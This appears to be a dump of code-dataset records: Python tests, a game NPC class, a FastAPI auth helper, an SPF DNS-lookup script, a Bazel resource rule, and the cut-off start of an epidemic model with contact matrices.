"OLDAP-2.6",
"Python-2.0"
] | null | null | null |
tests/test_rotate_3dmarkers.py
|
CRBS/etspecutil
|
d0b42730545cbf04e0cb222a40845e19ff9ee3f0
|
[
"OLDAP-2.6",
"Python-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_rotate_3dmarkers
----------------------------------
Tests for `rotate_3dmarkers` module.
"""
import sys
import unittest
import os.path
import tempfile
import shutil
import logging
from etspecutil.marker import MarkersList
from etspecutil.marker import MarkersFrom3DMarkersFileFactory
from etspecutil import rotate_3dmarkers
from etspecutil.rotate_3dmarkers import Parameters
class TestRotate3DMarkers(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_setup_logging(self):
theargs = Parameters()
theargs.loglevel = 'DEBUG'
rotate_3dmarkers._setup_logging(theargs)
self.assertEqual(rotate_3dmarkers.logger.getEffectiveLevel(),
logging.DEBUG)
theargs.loglevel = 'INFO'
rotate_3dmarkers._setup_logging(theargs)
self.assertEqual(rotate_3dmarkers.logger.getEffectiveLevel(),
logging.INFO)
theargs.loglevel = 'WARNING'
rotate_3dmarkers._setup_logging(theargs)
self.assertEqual(rotate_3dmarkers.logger.getEffectiveLevel(),
logging.WARNING)
theargs.loglevel = 'ERROR'
rotate_3dmarkers._setup_logging(theargs)
self.assertEqual(rotate_3dmarkers.logger.getEffectiveLevel(),
logging.ERROR)
theargs.loglevel = 'CRITICAL'
rotate_3dmarkers._setup_logging(theargs)
self.assertEqual(rotate_3dmarkers.logger.getEffectiveLevel(),
logging.CRITICAL)
def test_parse_arguments(self):
theargs = rotate_3dmarkers._parse_arguments('hi', ['foo'])
self.assertEqual(theargs.markerfile, 'foo')
self.assertEqual(theargs.outfile, None)
self.assertEqual(theargs.angle, 90)
self.assertEqual(theargs.width, 1080)
self.assertEqual(theargs.height, 1080)
self.assertEqual(theargs.loglevel, 'WARNING')
targs = rotate_3dmarkers._parse_arguments('hi', ['--angle', '45',
'--outfile', 'out',
'--width', '10',
'--height', '20',
'--log', 'DEBUG',
'foo2'])
self.assertEqual(targs.markerfile, 'foo2')
self.assertEqual(targs.outfile, 'out')
self.assertEqual(targs.angle, 45)
self.assertEqual(targs.width, 10)
self.assertEqual(targs.height, 20)
self.assertEqual(targs.loglevel, 'DEBUG')
def test_rotate_markers_file_outfile_set_to_none(self):
temp_dir = tempfile.mkdtemp()
try:
markerfile = os.path.join(temp_dir, '3Dmarkers.txt')
markers = MarkersList()
markers.add_marker(1, 2, 3, 4)
markers.write_markers_to_file(markerfile)
theargs = Parameters()
theargs.outfile = None
theargs.angle = 90
theargs.width = 10
theargs.height = 10
theargs.markerfile = markerfile
rotate_3dmarkers.rotate_markers_file(theargs)
origfile = markerfile + '.orig'
self.assertTrue(os.path.isfile(origfile))
fac = MarkersFrom3DMarkersFileFactory(origfile)
markers = fac.get_markerslist()
m = markers.get_markers()[0]
self.assertEqual(m.get_index(), 1)
self.assertEqual(m.get_x(), 2)
self.assertEqual(m.get_y(), 3)
self.assertEqual(m.get_z(), 4)
self.assertTrue(os.path.isfile(markerfile))
fac = MarkersFrom3DMarkersFileFactory(markerfile)
markers = fac.get_markerslist()
m = markers.get_markers()[0]
self.assertEqual(m.get_index(), 1)
self.assertEqual(m.get_x(), 7)
self.assertEqual(m.get_y(), 2)
self.assertEqual(m.get_z(), 4)
finally:
shutil.rmtree(temp_dir)
def test_rotate_markers_file_outfile_set(self):
temp_dir = tempfile.mkdtemp()
try:
markerfile = os.path.join(temp_dir, '3Dmarkers.txt')
markers = MarkersList()
markers.add_marker(1, 2, 3, 4)
markers.write_markers_to_file(markerfile)
outfile = os.path.join(temp_dir, 'out')
theargs = Parameters()
theargs.outfile = outfile
theargs.angle = 90
theargs.width = 10
theargs.height = 10
theargs.markerfile = markerfile
rotate_3dmarkers.rotate_markers_file(theargs)
self.assertTrue(os.path.isfile(markerfile))
fac = MarkersFrom3DMarkersFileFactory(outfile)
markers = fac.get_markerslist()
m = markers.get_markers()[0]
self.assertEqual(m.get_index(), 1)
self.assertEqual(m.get_x(), 7)
self.assertEqual(m.get_y(), 2)
self.assertEqual(m.get_z(), 4)
finally:
shutil.rmtree(temp_dir)
def test_main(self):
try:
rotate_3dmarkers.main()
self.fail('Expected OSError')
except OSError:
pass
if __name__ == '__main__':
sys.exit(unittest.main())
| 35.155844
| 76
| 0.579424
| 4,919
| 0.90857
| 0
| 0
| 0
| 0
| 0
| 0
| 376
| 0.06945
|
a1efd6d129721046eb1d2381c5f7945eeeb81f90
| 431
|
py
|
Python
|
tests/conftest.py
|
asvetlov/aiohttp_mako
|
8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a
|
[
"Apache-2.0"
] | 24
|
2016-12-25T16:24:45.000Z
|
2020-04-07T14:39:28.000Z
|
tests/conftest.py
|
jettify/aiohttp_mako
|
8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a
|
[
"Apache-2.0"
] | 168
|
2016-11-12T20:50:34.000Z
|
2022-03-18T02:09:08.000Z
|
tests/conftest.py
|
jettify/aiohttp_mako
|
8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a
|
[
"Apache-2.0"
] | 9
|
2016-12-13T10:48:26.000Z
|
2020-09-17T10:42:40.000Z
|
import sys
import pytest
import aiohttp_mako
from aiohttp import web
@pytest.fixture
def app():
app = web.Application()
lookup = aiohttp_mako.setup(app, input_encoding='utf-8',
output_encoding='utf-8',
default_filters=['decode.utf8'])
tplt = "<html><body><h1>${head}</h1>${text}</body></html>"
lookup.put_string('tplt.html', tplt)
return app
| 22.684211
| 64
| 0.584687
| 0
| 0
| 0
| 0
| 357
| 0.828306
| 0
| 0
| 89
| 0.206497
|
a1f3d906821dbcf88254a5e1e8e69f73b13693e7
| 3,583
|
py
|
Python
|
CraftMasterGame/src/enemy.py
|
Athelios/CraftMaster
|
636cc60681d3199b3ae685690ee427fe81672541
|
[
"MIT"
] | null | null | null |
CraftMasterGame/src/enemy.py
|
Athelios/CraftMaster
|
636cc60681d3199b3ae685690ee427fe81672541
|
[
"MIT"
] | null | null | null |
CraftMasterGame/src/enemy.py
|
Athelios/CraftMaster
|
636cc60681d3199b3ae685690ee427fe81672541
|
[
"MIT"
] | null | null | null |
from npc import *
import math
from pyglet import image
from pyglet.graphics import TextureGroup
import os
import json
class Enemy(Npc):
def __init__(self, world, position, health, dy=0, walkSpeed=5, flying=False, flySpeed=10, height=1, jumpHeight=1.0):
super(Enemy, self).__init__(world, position, health, dy, walkSpeed, flying, flySpeed, height, jumpHeight)
self.model = self.createModel(world)
self.rotateSelfY(-math.pi/2)
with open(os.path.join('animation', 'enemy.anim'), 'r') as file:
self.animation = json.load(file)
self.frames = [0, 0, 0]
self.attacking = False
def createModel(self, world):
texture0 = TextureGroup(image.load(os.path.join("texture", "zombie0.png")).get_texture())
texture1 = TextureGroup(image.load(os.path.join("texture", "zombie1.png")).get_texture())
x, y, z = self.position
cube1 = createCube(world, texture0, x + 0.15, y + 0.15, z, 0.29, 0.7, 0.25)
cube2 = createCube(world, texture0, x - 0.15, y + 0.15, z, 0.29, 0.7, 0.25)
cube3 = createCube(world, texture0, x, y + 0.8, z, 0.6, 0.7, 0.3)
cube4 = createCube(world, texture0, x + 0.4, y + 0.8, z, 0.2, 0.7, 0.2)
cube5 = createCube(world, texture0, x - 0.4, y + 0.8, z, 0.2, 0.7, 0.2)
cube6 = createCube(world, texture1, x, y + 1.3, z, 0.5, 0.5, 0.5)
model = [cube1, cube2, cube3, cube4, cube5, cube6]
return model
def ai(self, world):
if 2 < self.distanceTo(world.player) < 20:
self.goal = list(world.player.position)
self.goal = (int(round(self.goal[0])), int(round(self.goal[1])) - 1, int(round(self.goal[2])))
if self.counter % 20 == 0:
self.navigation.navigate()
elif self.distanceTo(world.player) <= 2:
self.goal = None
if self.energy == 100:
self.attack(world.player)
else:
self.goal = None
def attack(self, player):
vector = [10*(player.position[0] - self.position[0]), 10*(player.position[2] - self.position[2]), 10]
player.hit(vector)
self.attacking = True
self.energy = 0
def update(self, dt, world):
if not self.stunned:
self.ai(world)
if self.goal:
self.navigate()
else:
if self.stunned == 1:
self.goal = list(self.world.player.position)
self.navigation.navigate()
delta = [self.position[0] - self.lastPosition[0], self.position[1] - self.lastPosition[1], self.position[2] - self.lastPosition[2]]
for shape in self.model:
for part in shape:
for i in range(0, len(part.vertices), 3):
part.vertices[i] += delta[0]
part.vertices[i + 1] += delta[1]
part.vertices[i + 2] += delta[2]
walk = delta[0] != 0 or delta[2] != 0
self.walking = self.walking or walk
if self.distanceTo(world.player) <= 3:
delta = [world.player.position[0] - self.position[0], world.player.position[1] - self.position[1], world.player.position[2] - self.position[2]]
theta = self.angle(self.sight, [delta[0], delta[2]])
if delta[0] != 0 or delta[2] != 0:
self.rotateSelfY(theta)
self.sight = [delta[0], delta[2]]
self.lastPosition = list(self.position)
self.counter += 1
self.energy = min(self.energy + 2, 100)
self.animate()
super(Enemy, self).update(dt, world)
| 42.654762
| 155
| 0.568518
| 3,462
| 0.966229
| 0
| 0
| 0
| 0
| 0
| 0
| 70
| 0.019537
|
a1f67693d5e8c244c0eda84f1334ad34e26d18f3
| 754
|
py
|
Python
|
goldsrc/mdl/structs/bodypart.py
|
half5life/SourceIO
|
f3dc6db92daa537acbb487ce09f371866f6e3e7f
|
[
"MIT"
] | 1
|
2021-07-12T12:55:27.000Z
|
2021-07-12T12:55:27.000Z
|
goldsrc/mdl/structs/bodypart.py
|
half5life/SourceIO
|
f3dc6db92daa537acbb487ce09f371866f6e3e7f
|
[
"MIT"
] | null | null | null |
goldsrc/mdl/structs/bodypart.py
|
half5life/SourceIO
|
f3dc6db92daa537acbb487ce09f371866f6e3e7f
|
[
"MIT"
] | null | null | null |
from typing import List
from .model import StudioModel
from ....source_shared.base import Base
from ....utilities.byte_io_mdl import ByteIO
class StudioBodypart(Base):
def __init__(self):
self.name = ''
self.model_count = 0
self.base = 0
self.model_offset = 0
self.models: List[StudioModel] = []
def read(self, reader: ByteIO):
self.name = reader.read_ascii_string(64)
(self.model_count, self.base, self.model_offset) = reader.read_fmt('3i')
with reader.save_current_pos():
reader.seek(self.model_offset)
for _ in range(self.model_count):
model = StudioModel()
model.read(reader)
self.models.append(model)
| 30.16
| 80
| 0.619363
| 610
| 0.809019
| 0
| 0
| 0
| 0
| 0
| 0
| 6
| 0.007958
|
a1f747225cd20292d907c35e437ba676e03d1874
| 511
|
py
|
Python
|
app/core/auth.py
|
oxfn/owtest
|
f4eeae225ef67684d96edd5708c44a0fd639d037
|
[
"Unlicense"
] | null | null | null |
app/core/auth.py
|
oxfn/owtest
|
f4eeae225ef67684d96edd5708c44a0fd639d037
|
[
"Unlicense"
] | null | null | null |
app/core/auth.py
|
oxfn/owtest
|
f4eeae225ef67684d96edd5708c44a0fd639d037
|
[
"Unlicense"
] | null | null | null |
from fastapi import Depends
from fastapi.exceptions import HTTPException
from fastapi.security import OAuth2PasswordBearer
from app.models.users import User, UserRepository
get_token = OAuth2PasswordBearer(tokenUrl="/login")
async def get_user(
token: str = Depends(get_token), users: UserRepository = Depends()
) -> User:
"""Get current authenticated user."""
user = await users.get(token=token)
if user:
return user
raise HTTPException(status_code=403, detail="Invalid token")
| 28.388889
| 70
| 0.749511
| 0
| 0
| 0
| 0
| 0
| 0
| 281
| 0.549902
| 60
| 0.117417
|
a1f94bf8941a2359311bcdccf3b7596591d7d459
| 1,449
|
py
|
Python
|
hard-gists/4471462/snippet.py
|
jjhenkel/dockerizeme
|
eaa4fe5366f6b9adf74399eab01c712cacaeb279
|
[
"Apache-2.0"
] | 21
|
2019-07-08T08:26:45.000Z
|
2022-01-24T23:53:25.000Z
|
hard-gists/4471462/snippet.py
|
jjhenkel/dockerizeme
|
eaa4fe5366f6b9adf74399eab01c712cacaeb279
|
[
"Apache-2.0"
] | 5
|
2019-06-15T14:47:47.000Z
|
2022-02-26T05:02:56.000Z
|
hard-gists/4471462/snippet.py
|
jjhenkel/dockerizeme
|
eaa4fe5366f6b9adf74399eab01c712cacaeb279
|
[
"Apache-2.0"
] | 17
|
2019-05-16T03:50:34.000Z
|
2021-01-14T14:35:12.000Z
|
#!/usr/bin/env python
#
# Author: Fred C.
# Email:
#
from __future__ import print_function
from collections import defaultdict
import sys
import DNS
import re
RE_PARSE = re.compile(r'(ip4|ip6|include|redirect)[:=](.*)', re.IGNORECASE)
MAX_RECURSION = 5
def dns_txt(domain):
try:
resp = DNS.dnslookup(domain, 'TXT')
except DNS.ServerError as err:
print(err, file=sys.stderr)
return None
response = []
for r in resp:
response.append(''.join(r))
return response
def dns_parse(txt_field):
resp = defaultdict(set)
for rec in txt_field:
fields = rec.split()
for field in fields:
match = RE_PARSE.match(field)
if match:
resp[match.group(1)].add(match.group(2))
return resp
def process(domain):
domains = [domain]
ip_addresses = set()
for cnt in range(MAX_RECURSION):
includes = set()
for dom in domains:
txt = dns_txt(dom)
if not txt:
continue
spf = dns_parse(txt)
ip_addresses |= spf.get('ip4', set())
ip_addresses |= spf.get('ip6', set())
includes |= spf.get('include', set())
includes |= spf.get('redirect', set())
if not includes:
break
domains = includes
return ip_addresses
if __name__ == '__main__':
whitelist = set()
with open(sys.argv[1]) as fd:
for line in fd:
line = line.strip()
for ip in process(line):
whitelist.add(ip)
for ip in sorted(whitelist):
print(ip)
| 21.308824
| 75
| 0.63285
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 131
| 0.090407
|
a1f99eeded3cabb05a888e2acb13ce873a05d09f
| 895
|
bzl
|
Python
|
tools/build_rules/cc_resources.bzl
|
justbuchanan/kythe
|
91da8b42354cd3b6818be5a9bf4389fd144ff6e5
|
[
"Apache-2.0"
] | null | null | null |
tools/build_rules/cc_resources.bzl
|
justbuchanan/kythe
|
91da8b42354cd3b6818be5a9bf4389fd144ff6e5
|
[
"Apache-2.0"
] | null | null | null |
tools/build_rules/cc_resources.bzl
|
justbuchanan/kythe
|
91da8b42354cd3b6818be5a9bf4389fd144ff6e5
|
[
"Apache-2.0"
] | null | null | null |
def cc_resources(name, data):
out_inc = name + ".inc"
cmd = ('echo "static const struct FileToc kPackedFiles[] = {" > $(@); \n' +
"for j in $(SRCS); do\n" +
' echo "{\\"$$(basename "$${j}")\\"," >> $(@);\n' +
' echo "R\\"filecontent($$(< $${j}))filecontent\\"" >> $(@);\n' +
' echo "}," >> $(@);\n' +
"done &&\n" +
'echo "{nullptr, nullptr}};" >> $(@)')
if len(data) == 0:
fail("Empty `data` attribute in `%s`" % name)
native.genrule(
name = name,
outs = [out_inc],
srcs = data,
cmd = cmd,
)
# Returns the generated files directory root.
#
# Note: workaround for https://github.com/bazelbuild/bazel/issues/4463.
def gendir():
if native.repository_name() == "@":
return "$(GENDIR)"
return "$(GENDIR)/external/" + native.repository_name().lstrip("@")
| 34.423077
| 79
| 0.484916
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 469
| 0.524022
|
a1fa4d83464708be7267466fae9107d6a82954d1
| 32,249
|
py
|
Python
|
modelling/model_seiihurd_matrices.py
|
lhunlindeion/Mathematical-and-Statistical-Modeling-of-COVID19-in-Brazil
|
164f19fcf04fe391aa7515fe436c63c6534fa89c
|
[
"MIT"
] | 37
|
2020-03-28T16:36:56.000Z
|
2021-11-16T11:34:55.000Z
|
modelling/model_seiihurd_matrices.py
|
lhunlindeion/Mathematical-and-Statistical-Modeling-of-COVID19-in-Brazil
|
164f19fcf04fe391aa7515fe436c63c6534fa89c
|
[
"MIT"
] | 1
|
2020-05-29T16:39:03.000Z
|
2020-06-01T19:29:55.000Z
|
modelling/model_seiihurd_matrices.py
|
lhunlindeion/Mathematical-and-Statistical-Modeling-of-COVID19-in-Brazil
|
164f19fcf04fe391aa7515fe436c63c6534fa89c
|
[
"MIT"
] | 9
|
2020-03-28T00:00:16.000Z
|
2021-02-19T14:41:47.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 19 18:08:01 2020
@author: Felipe A. C. Pereira
Implementação do ajuste do modelo SEIIHURD com separação de grupos. Necessita
de mais verificações e funções para simplificar o input. Baseado nas classes
disponíveis no modelos.py
"""
import numpy as np
from functools import reduce
import scipy.integrate as spi
from scipy.optimize import least_squares
from platypus import NSGAII, Problem, Real
from pyswarms.single.global_best import GlobalBestPSO
import pyswarms as ps
from pyswarms.backend.topology import Star
from pyswarms.utils.plotters import plot_cost_history
from itertools import repeat
import multiprocessing as mp
import copy
import joblib
'''
Social contact matrices from
PREM, Kiesha; COOK, Alex R.; JIT, Mark. Projecting social contact matrices in
152 countries using contact surveys and demographic data. PLoS computational
biology, v. 13, n. 9, p. e1005697, 2017.
'''
ages_Mu_min = 5 * np.arange(16)
Mu_house = np.array([[0.47868515, 0.50507561, 0.29848922, 0.15763748, 0.26276959,
0.40185462, 0.46855027, 0.42581354, 0.2150961 , 0.0856771 ,
0.08705463, 0.07551931, 0.05129175, 0.02344832, 0.00793644,
0.01072846],
[0.35580205, 0.77874482, 0.51392686, 0.21151069, 0.08597966,
0.28306027, 0.49982218, 0.52854893, 0.41220947, 0.15848728,
0.07491245, 0.07658339, 0.04772343, 0.02588962, 0.01125956,
0.01073152],
[0.25903114, 0.63488713, 1.36175618, 0.50016515, 0.11748191,
0.10264613, 0.24113458, 0.47274372, 0.54026417, 0.26708819,
0.11007723, 0.04406045, 0.02746409, 0.02825033, 0.02044872,
0.01214665],
[0.14223192, 0.24383932, 0.53761638, 1.05325205, 0.28778496,
0.10925453, 0.0651564 , 0.2432454 , 0.39011334, 0.41381277,
0.23194909, 0.07541471, 0.03428398, 0.02122257, 0.01033573,
0.00864859],
[0.27381886, 0.15430529, 0.16053062, 0.5104134 , 0.95175366,
0.3586594 , 0.09248672, 0.04774269, 0.15814197, 0.36581739,
0.25544811, 0.13338965, 0.03461345, 0.01062458, 0.00844199,
0.00868782],
[0.59409802, 0.26971847, 0.10669146, 0.18330524, 0.39561893,
0.81955947, 0.26376865, 0.06604084, 0.03824556, 0.11560004,
0.23218163, 0.15331788, 0.07336147, 0.02312255, 0.00412646,
0.01025778],
[0.63860889, 0.75760606, 0.43109156, 0.09913293, 0.13935789,
0.32056062, 0.65710277, 0.25488454, 0.1062129 , 0.0430932 ,
0.06880784, 0.09938458, 0.09010691, 0.02233902, 0.01155556,
0.00695246],
[0.56209348, 0.87334544, 0.75598244, 0.33199136, 0.07233271,
0.08674171, 0.20243583, 0.60062714, 0.17793601, 0.06307045,
0.04445926, 0.04082447, 0.06275133, 0.04051762, 0.01712777,
0.00598721],
[0.35751289, 0.66234582, 0.77180208, 0.54993616, 0.17368099,
0.07361914, 0.13016852, 0.19937327, 0.46551558, 0.15412263,
0.06123041, 0.0182514 , 0.04234381, 0.04312892, 0.01656267,
0.01175358],
[0.208131 , 0.41591452, 0.56510014, 0.67760241, 0.38146504,
0.14185001, 0.06160354, 0.12945701, 0.16470166, 0.41150841,
0.14596804, 0.04404807, 0.02395316, 0.01731295, 0.01469059,
0.02275339],
[0.30472548, 0.26744442, 0.41631962, 0.46516888, 0.41751365,
0.28520772, 0.13931619, 0.07682945, 0.11404965, 0.16122096,
0.33813266, 0.1349378 , 0.03755396, 0.01429426, 0.01356763,
0.02551792],
[0.52762004, 0.52787011, 0.33622117, 0.43037934, 0.36416323,
0.42655672, 0.33780201, 0.13492044, 0.0798784 , 0.15795568,
0.20367727, 0.33176385, 0.12256126, 0.05573807, 0.0124446 ,
0.02190564],
[0.53741472, 0.50750067, 0.3229994 , 0.30706704, 0.21340314,
0.27424513, 0.32838657, 0.26023515, 0.13222548, 0.07284901,
0.11950584, 0.16376401, 0.25560123, 0.09269703, 0.02451284,
0.00631762],
[0.37949376, 0.55324102, 0.47449156, 0.24796638, 0.19276924,
0.20675484, 0.3267867 , 0.39525729, 0.3070043 , 0.10088992,
0.10256839, 0.13016641, 0.1231421 , 0.24067708, 0.05475668,
0.01401368],
[0.16359554, 0.48536065, 0.40533723, 0.31542539, 0.06890518,
0.15670328, 0.12884062, 0.27912381, 0.25685832, 0.20143856,
0.12497647, 0.07565566, 0.10331686, 0.08830789, 0.15657321,
0.05744065],
[0.29555039, 0.39898035, 0.60257982, 0.5009724 , 0.13799378,
0.11716593, 0.14366306, 0.31602298, 0.34691652, 0.30960511,
0.31253708, 0.14557295, 0.06065554, 0.10654772, 0.06390924,
0.09827735]])
Mu_school = np.array([[3.21885854e-001, 4.31659966e-002, 7.88269419e-003,
8.09548363e-003, 5.35038146e-003, 2.18201974e-002,
4.01633514e-002, 2.99376002e-002, 1.40680283e-002,
1.66587853e-002, 9.47774696e-003, 7.41041622e-003,
1.28200661e-003, 7.79120405e-004, 8.23608272e-066,
6.37926405e-120],
[5.40133328e-002, 4.84870697e+000, 2.70046494e-001,
3.14778450e-002, 3.11206331e-002, 8.56826951e-002,
1.08251879e-001, 9.46101139e-002, 8.63528188e-002,
5.51141159e-002, 4.19385198e-002, 1.20958942e-002,
4.77242219e-003, 1.39787217e-003, 3.47452943e-004,
8.08973738e-039],
[4.56461982e-004, 1.04840235e+000, 6.09152459e+000,
1.98915822e-001, 1.99709921e-002, 6.68319525e-002,
6.58949586e-002, 9.70851505e-002, 9.54147078e-002,
6.70538232e-002, 4.24864096e-002, 1.98701346e-002,
5.11869429e-003, 7.27320438e-004, 4.93746124e-025,
1.82153965e-004],
[2.59613205e-003, 4.73315233e-002, 1.99337834e+000,
7.20040500e+000, 8.57326037e-002, 7.90668822e-002,
8.54208542e-002, 1.10816964e-001, 8.76955236e-002,
9.22975521e-002, 4.58035025e-002, 2.51130956e-002,
5.71391798e-003, 1.07818752e-003, 6.21174558e-033,
1.70710246e-070],
[7.19158720e-003, 2.48833195e-002, 9.89727235e-003,
8.76815025e-001, 4.33963352e-001, 5.05185217e-002,
3.30594492e-002, 3.81384107e-002, 2.34709676e-002,
2.67235372e-002, 1.32913985e-002, 9.00655556e-003,
6.94913059e-004, 1.25675951e-003, 1.77164197e-004,
1.21957619e-047],
[7.04119204e-003, 1.19412206e-001, 3.75016980e-002,
2.02193056e-001, 2.79822908e-001, 1.68610223e-001,
2.86939363e-002, 3.56961469e-002, 4.09234494e-002,
3.32290896e-002, 8.12074348e-003, 1.26152144e-002,
4.27869081e-003, 2.41737477e-003, 4.63116893e-004,
1.28597237e-003],
[1.41486320e-002, 3.86561429e-001, 2.55902236e-001,
1.69973534e-001, 4.98104010e-002, 8.98122446e-002,
7.95333394e-002, 5.19274611e-002, 5.46612930e-002,
2.64567137e-002, 2.03241595e-002, 2.96263220e-003,
5.42888613e-003, 4.47585970e-004, 1.65440335e-048,
3.11189454e-055],
[2.40945305e-002, 2.11030046e-001, 1.54767246e-001,
8.17929897e-002, 1.84061608e-002, 5.43009779e-002,
7.39351186e-002, 5.21677009e-002, 5.63267084e-002,
2.51807147e-002, 3.53972554e-003, 7.96646343e-003,
5.56929776e-004, 2.08530461e-003, 1.84428290e-123,
9.69555083e-067],
[7.81313905e-003, 1.14371898e-001, 9.09011945e-002,
3.80212104e-001, 8.54533192e-003, 2.62430162e-002,
2.51880009e-002, 3.22563508e-002, 6.73506045e-002,
2.24997143e-002, 2.39241043e-002, 6.50627191e-003,
5.50892674e-003, 4.78308850e-004, 4.81213215e-068,
2.40231425e-092],
[6.55265016e-002, 2.31163536e-001, 1.49970765e-001,
5.53563093e-001, 5.74032526e-003, 3.02865481e-002,
5.72506883e-002, 4.70559232e-002, 4.28736553e-002,
2.42614518e-002, 2.86665377e-002, 1.29570473e-002,
3.24362518e-003, 1.67930318e-003, 6.20916950e-134,
3.27297624e-072],
[1.72765646e-002, 3.43744913e-001, 4.30902785e-001,
4.74293073e-001, 5.39328187e-003, 1.44128740e-002,
3.95545363e-002, 3.73781860e-002, 4.56834488e-002,
5.92135906e-002, 2.91473801e-002, 1.54857502e-002,
4.53105390e-003, 8.87272668e-024, 1.23797452e-117,
5.64262349e-078],
[6.14363036e-002, 2.98367348e-001, 2.59092700e-001,
3.00800812e-001, 5.92454596e-003, 5.26458862e-002,
2.02188672e-002, 3.27897605e-002, 4.07753741e-002,
2.83422407e-002, 2.43657809e-002, 2.73993226e-002,
8.87990718e-003, 1.13279180e-031, 7.81960493e-004,
7.62467510e-004],
[3.63695643e-002, 5.96870355e-002, 3.05072624e-002,
1.45523978e-001, 1.26062984e-002, 1.69458169e-003,
1.55127292e-002, 4.22097670e-002, 9.21792425e-003,
1.42200652e-002, 1.10967529e-002, 5.77020348e-003,
2.04474044e-002, 1.11075734e-002, 4.42271199e-067,
2.12068625e-037],
[1.67937029e-003, 2.72971001e-002, 1.05886266e-002,
7.61087735e-032, 1.97191559e-003, 1.92885006e-003,
1.24343737e-002, 5.39297787e-003, 5.41684968e-003,
8.63502071e-003, 1.94554498e-003, 1.49082274e-002,
8.11781100e-003, 1.74395489e-002, 1.11239023e-002,
3.45693088e-126],
[1.28088348e-028, 5.11065200e-026, 1.93019797e-040,
7.60476035e-003, 2.63586947e-022, 1.69749024e-024,
1.25875005e-026, 7.62109877e-003, 7.84979948e-003,
2.11516023e-002, 3.52117832e-002, 2.14360383e-002,
7.73902109e-003, 8.01328325e-003, 7.91285055e-003,
2.13825814e-002],
[2.81655586e-094, 2.11305187e-002, 8.46562506e-042,
2.12592841e-002, 4.89802057e-036, 7.59232387e-003,
9.77247001e-069, 2.23108239e-060, 1.43715978e-048,
8.56015694e-060, 4.69469043e-042, 1.59822047e-046,
2.20978550e-083, 8.85861277e-107, 1.02042815e-080,
6.61413913e-113]])
Mu_work = np.array([[0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 8.20604524e-092, 1.20585150e-005,
3.16436834e-125],
[0.00000000e+000, 1.16840561e-003, 9.90713236e-072,
4.42646396e-059, 2.91874286e-006, 9.98773031e-003,
2.58779981e-002, 5.66104376e-003, 2.12699812e-002,
5.72117462e-003, 1.48212306e-003, 1.23926126e-003,
1.28212945e-056, 1.34955578e-005, 7.64591325e-079,
2.38392073e-065],
[0.00000000e+000, 2.56552144e-003, 1.12756182e-001,
2.40351143e-002, 2.62981485e-002, 7.56512432e-003,
6.19587609e-002, 1.73269871e-002, 5.87405128e-002,
3.26749742e-002, 1.24709193e-002, 2.93054408e-008,
3.71596993e-017, 2.79780317e-053, 4.95800770e-006,
3.77718083e-102],
[0.00000000e+000, 1.07213881e-002, 4.28390448e-002,
7.22769090e-001, 5.93479736e-001, 3.39341952e-001,
3.17013715e-001, 2.89168861e-001, 3.11143180e-001,
2.34889238e-001, 1.32953769e-001, 6.01944097e-002,
1.47306181e-002, 8.34699602e-006, 2.85972822e-006,
1.88926122e-031],
[0.00000000e+000, 9.14252587e-003, 5.74508682e-002,
4.00000235e-001, 7.93386618e-001, 7.55975146e-001,
6.32277283e-001, 6.83601459e-001, 4.98506972e-001,
3.82309992e-001, 2.81363576e-001, 1.23338103e-001,
4.15708021e-002, 9.86113407e-006, 1.32609387e-005,
3.74318048e-006],
[0.00000000e+000, 1.04243481e-002, 7.34587492e-002,
3.49556755e-001, 7.50680101e-001, 1.25683393e+000,
9.01245714e-001, 8.63446835e-001, 7.70443641e-001,
5.17237071e-001, 4.09810981e-001, 1.80645400e-001,
5.51284783e-002, 1.60674627e-005, 1.01182608e-005,
3.01442534e-006],
[0.00000000e+000, 1.65842404e-002, 8.34076781e-002,
1.89301935e-001, 5.21246906e-001, 8.54460001e-001,
1.12054931e+000, 9.64310078e-001, 8.34675180e-001,
6.52534012e-001, 3.79383514e-001, 2.11198205e-001,
5.17285688e-002, 1.63795563e-005, 4.10100851e-006,
3.49478980e-006],
[0.00000000e+000, 1.11666639e-002, 5.03319748e-002,
3.70510313e-001, 4.24294782e-001, 7.87535547e-001,
8.45085693e-001, 1.14590365e+000, 1.07673077e+000,
7.13492115e-001, 5.00740004e-001, 1.90102207e-001,
3.59740115e-002, 1.22988530e-005, 9.13512833e-006,
6.02097416e-006],
[0.00000000e+000, 6.07792440e-003, 5.49337607e-002,
2.23499535e-001, 4.82353827e-001, 7.52291991e-001,
8.89187601e-001, 9.33765370e-001, 1.10492283e+000,
8.50124391e-001, 5.88941528e-001, 1.94947085e-001,
5.09477228e-002, 1.43626161e-005, 1.02721567e-005,
1.29503893e-005],
[0.00000000e+000, 3.31622551e-003, 7.01829848e-002,
2.67512972e-001, 3.14796392e-001, 5.41516885e-001,
6.95769048e-001, 7.50620518e-001, 7.50038547e-001,
7.00954088e-001, 4.35197983e-001, 2.11283335e-001,
3.88576200e-002, 1.62810370e-005, 1.08243610e-005,
6.09172339e-006],
[0.00000000e+000, 4.39576425e-004, 7.17737968e-002,
1.89254612e-001, 2.47832532e-001, 5.16027731e-001,
6.02783971e-001, 6.15949277e-001, 8.05581107e-001,
7.44063535e-001, 5.44855374e-001, 2.52198706e-001,
4.39235685e-002, 1.18079721e-005, 1.18226645e-005,
1.01613165e-005],
[0.00000000e+000, 4.91737561e-003, 1.08686672e-001,
1.24987806e-001, 1.64110983e-001, 3.00118829e-001,
4.18159745e-001, 3.86897613e-001, 4.77718241e-001,
3.60854250e-001, 3.22466456e-001, 1.92516925e-001,
4.07209694e-002, 1.34978304e-005, 6.58739925e-006,
6.65716756e-006],
[0.00000000e+000, 6.35447018e-004, 3.96329620e-002,
1.83072502e-002, 7.04596701e-002, 1.24861117e-001,
1.37834574e-001, 1.59845720e-001, 1.66933479e-001,
1.56084857e-001, 1.14949158e-001, 8.46570798e-002,
1.50879843e-002, 2.03019580e-005, 8.26102156e-006,
1.48398182e-005],
[7.60299521e-006, 3.36326754e-006, 7.64855296e-006,
